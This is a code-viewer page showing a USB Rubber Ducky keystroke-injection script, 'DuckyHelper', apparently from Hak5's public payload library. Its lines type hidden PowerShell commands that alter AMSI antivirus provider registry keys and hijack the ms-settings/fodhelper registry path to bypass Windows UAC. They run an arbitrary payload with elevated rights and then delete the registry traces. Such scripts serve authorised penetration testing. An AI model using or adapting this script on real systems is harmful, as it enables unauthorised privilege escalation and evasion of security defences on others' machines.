Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/execution/DuckyHelper/DuckyHelper.txt
3018 views
1
REM DuckyHelper
2
REM Version 1.0
3
REM OS: Windows 10
4
REM Author: 0i41E
5
6
REM UAC bypass for privilege escalation (Method FodHelper)
7
REM AV will notify, but payload will still be executed
8
REM Payload configured in line 19 & 21 (cmd.exe) : $P="cmd.exe /c powershell New-Item 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFF}' -Force; Remove-Item -Path 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}' -Recurse;[PAYLOAD]
9
10
DELAY 1500
11
GUI r
12
DELAY 500
13
STRING powershell -NoP -NonI -WindowStyle hidden -Exec Bypass
14
DELAY 250
15
ENTER
16
17
DELAY 200
18
STRING $P="cmd.exe /c powershell New-Item 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFF}' -Fo
19
DELAY 100
20
STRING rce; Remove-Item -Path 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}' -Recurse; cmd.e
21
DELAY 100
22
STRING xe";Start-Sleep 1;New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force;;New-ItemProperty -Path "HKC
23
DELAY 100
24
STRING U:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force;Set-ItemProperty -Path "H
25
DELAY 100
26
STRING KCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $P -Force;Start-Process "C:\Windows\Sys
27
DELAY 100
28
STRING tem32\fodhelper.exe" -WindowStyle Hidden;Start-Sleep 3
29
DELAY 100
30
ENTER
31
32
DELAY 5000
33
GUI r
34
DELAY 500
35
STRING powershell -NoP -NonI -Exec Bypass
36
DELAY 250
37
ENTER
38
39
DELAY 200
40
STRING Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
41
DELAY 100
42
ENTER
43
44
DELAY 300
45
STRING exit
46
DELAY 100
47
ENTER
48
49